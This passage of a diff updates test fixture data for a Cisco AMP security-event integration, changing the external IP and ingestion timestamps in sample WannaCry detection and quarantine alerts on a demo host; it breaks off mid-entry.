"ingested": "2021-09-30T00:14:44.025440745Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":235000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2708,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "ingested": "2021-12-09T13:35:39.764472800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":235000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2708,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -6707,7 +6707,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -6757,7 +6757,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -6774,8 +6774,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025443013Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":172000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764478100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":172000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -6797,7 +6797,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6838,7 +6838,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -6848,8 +6848,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025445273Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764482100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -6869,7 +6869,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6910,7 +6910,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -6920,8 +6920,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025451903Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764486800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -6941,7 +6941,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6986,7 +6986,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -6996,8 +6996,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025455291Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.764492700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -7017,7 +7017,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7062,7 +7062,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -7072,8 +7072,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025457585Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":33000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.764498600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":33000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -7093,7 +7093,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7147,7 +7147,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -7164,8 +7164,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025459833Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764503500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7187,7 +7187,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7237,7 +7237,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -7254,8 +7254,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025462032Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764508400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7277,7 +7277,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7327,7 +7327,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - 